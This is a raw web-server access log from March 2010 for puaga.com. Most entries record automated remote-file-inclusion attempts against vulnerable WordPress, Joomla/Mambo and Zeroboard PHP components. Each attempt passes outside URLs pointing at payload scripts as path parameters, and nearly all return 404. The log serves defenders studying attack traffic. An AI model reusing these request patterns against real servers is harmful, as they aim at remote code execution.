200.93.147.154 - - [05/Mar/2010:04:00:11 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:00:11 -0800] "GET /logs/access_100128.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:00:11 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:00:23 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:00:23 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:00:24 -0800] "GET /logs/access_100128.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [05/Mar/2010:04:00:33 -0800] "GET /com_webring/admin.webring.docs.php?component_dir=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [05/Mar/2010:04:00:33 -0800] "GET /logs/access_100219.log//com_webring/admin.webring.docs.php?component_dir=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [05/Mar/2010:04:00:33 -0800] "GET /logs//com_webring/admin.webring.docs.php?component_dir=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [05/Mar/2010:04:01:11 -0800] "GET /logs/access_100214.log//com_webring/admin.webring.docs.php?component_dir=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.132 - - [05/Mar/2010:04:02:38 -0800] "GET /com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.132 - - [05/Mar/2010:04:02:38 -0800] "GET /logs/access_100221.log%20%20//com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.132 - - [05/Mar/2010:04:02:38 -0800] "GET /logs//com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.132 - - [05/Mar/2010:04:02:53 -0800] "GET /logs/access_100206.log%20%20//com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:03:40 -0800] "GET /logs/access_100208.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:04:03:44 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:04:03:44 -0800] "GET /logs/access_100128.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:04:03:44 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:04:03:47 -0800] "GET /logs/access_100129.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:04:12 -0800] "GET /logs/access_100208.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:04:04:14 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:04:04:14 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:04:04:14 -0800] "GET /logs/access_100128.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:04:04:18 -0800] "GET /logs/access_100129.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:04:04:29 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:04:04:29 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:04:04:29 -0800] "GET /logs/access_100128.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:04:04:35 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:04:04:35 -0800] "GET /logs/access_100129.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:04:04:35 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:04:04:36 -0800] "GET /logs/access_100128.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:04:04:38 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:04:04:38 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:04:04:39 -0800] "GET /logs/access_100128.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:04:04:41 -0800] "GET /logs/access_100129.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:04:04:44 -0800] "GET /logs/access_100129.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:04:04:48 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:04:04:48 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:04:04:49 -0800] "GET /logs/access_100128.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:04:04:54 -0800] "GET /logs/access_100129.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:04:05:14 -0800] "GET /logs//kboard/zboard.php?id=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:04:05:14 -0800] "GET /logs/access_100214.log//kboard/zboard.php?id=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:04:05:14 -0800] "GET /kboard/zboard.php?id=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [05/Mar/2010:04:05:35 -0800] "GET /logs/access_100214.log//kboard/zboard.php?id=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [05/Mar/2010:04:05:35 -0800] "GET /kboard/zboard.php?id=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [05/Mar/2010:04:05:35 -0800] "GET /logs//kboard/zboard.php?id=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [05/Mar/2010:04:06:53 -0800] "GET /components/com_fabrik/libs/Blowfish/PHP.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [05/Mar/2010:04:06:53 -0800] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/PHP.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [05/Mar/2010:04:06:53 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/PHP.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [05/Mar/2010:04:07:04 -0800] "GET /logs/access_100226.log//kboard/zboard.php?id=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:04:07:06 -0800] "GET /logs/access_100226.log//kboard/zboard.php?id=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [05/Mar/2010:04:09:08 -0800] "GET /logs/access_100211.log//components/com_fabrik/libs/Blowfish/PHP.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:11:30 -0800] "GET /com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:11:30 -0800] "GET /logs/access_100210.log%20%20//com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:11:31 -0800] "GET /logs//com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:12:07 -0800] "GET /logs//com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:12:13 -0800] "GET /logs/access_100210.log%20%20//com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:12:13 -0800] "GET /com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:04:12:18 -0800] "GET /logs//com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:04:12:18 -0800] "GET /logs/access_100129.log%20%20//com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:04:12:18 -0800] "GET /com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:12:21 -0800] "GET /logs/access_100210.log%20%20//com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:12:21 -0800] "GET /com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:12:23 -0800] "GET /logs/access_100210.log%20%20//com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:12:24 -0800] "GET /com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:12:24 -0800] "GET /logs//com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:12:25 -0800] "GET /logs//com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:12:27 -0800] "GET /com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.40 - - [05/Mar/2010:04:12:28 -0800] "GET /logs/access_100126.log//components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.40 - - [05/Mar/2010:04:12:28 -0800] "GET /components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.40 - - [05/Mar/2010:04:12:28 -0800] "GET /logs//components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:12:29 -0800] "GET /logs/access_100210.log%20%20//com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.40 - - [05/Mar/2010:04:12:34 -0800] "GET /logs/access_100208.log//components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:04:13:25 -0800] "GET /logs/access_100224.log%20%20//com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [05/Mar/2010:04:14:26 -0800] "GET /logs/access_100214.log/?id=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [05/Mar/2010:04:14:26 -0800] "GET /logs/?id=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [05/Mar/2010:04:14:27 -0800] "GET /?id=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:04:15:06 -0800] "GET /logs//com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:04:15:06 -0800] "GET /com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:04:15:06 -0800] "GET /logs/access_100129.log%20%20//com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:04:15:23 -0800] "GET /logs//components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:04:15:23 -0800] "GET /logs/access_100208.log//components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:04:15:23 -0800] "GET /logs/access_100126.log//components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:04:15:23 -0800] "GET /components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:04:15:35 -0800] "GET /components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:04:15:35 -0800] "GET /logs//components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:04:15:35 -0800] "GET /logs/access_100208.log//components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:04:15:35 -0800] "GET /logs/access_100126.log//components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [05/Mar/2010:04:15:49 -0800] "GET /logs/access_100226.log/?id=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:04:15:53 -0800] "GET /logs//com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:04:15:53 -0800] "GET /com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:04:15:53 -0800] "GET /logs/access_100129.log%20%20//com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.250.255.242 - - [05/Mar/2010:04:16:24 -0800] "GET /logs/access_091213.log HTTP/1.1" 404 5258 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:04:16:31 -0800] "GET /logs/access_100224.log%20%20//com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:04:17:10 -0800] "GET /logs/access_100224.log%20%20//com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.37.97 - - [05/Mar/2010:04:19:00 -0800] "GET /module/view.php HTTP/1.0" 200 2548 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.97 - - [05/Mar/2010:04:19:02 -0800] "GET /style/default_style.css HTTP/1.0" 200 1982 "http://puaga.com/module/view.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.97 - - [05/Mar/2010:04:19:04 -0800] "GET /themes/retro.css HTTP/1.0" 404 5258 "http://puaga.com/module/view.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
118.168.12.244 - - [05/Mar/2010:04:19:45 -0800] "GET /logs/access_100126.log%20%20//components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:04:19:45 -0800] "GET /logs/access_100208.log%20%20//components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:21:11 -0800] "GET /logs/access_100206.log%20%20//com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:21:30 -0800] "GET /logs/access_100210.log//com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:21:30 -0800] "GET /com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:21:30 -0800] "GET /logs//com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:21:45 -0800] "GET /logs//com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:21:47 -0800] "GET /com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:21:47 -0800] "GET /logs/access_100210.log//com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:21:51 -0800] "GET /com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:21:51 -0800] "GET /logs/access_100210.log//com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:21:51 -0800] "GET /logs//com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.112.170.135 - - [05/Mar/2010:04:21:54 -0800] "GET /logs/access_100219.log//administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ess.uvic.ca/files/photologue/photos/frosh2008/idi.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
69.112.170.135 - - [05/Mar/2010:04:21:54 -0800] "GET /logs//administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ess.uvic.ca/files/photologue/photos/frosh2008/idi.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
69.112.170.135 - - [05/Mar/2010:04:21:54 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ess.uvic.ca/files/photologue/photos/frosh2008/idi.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
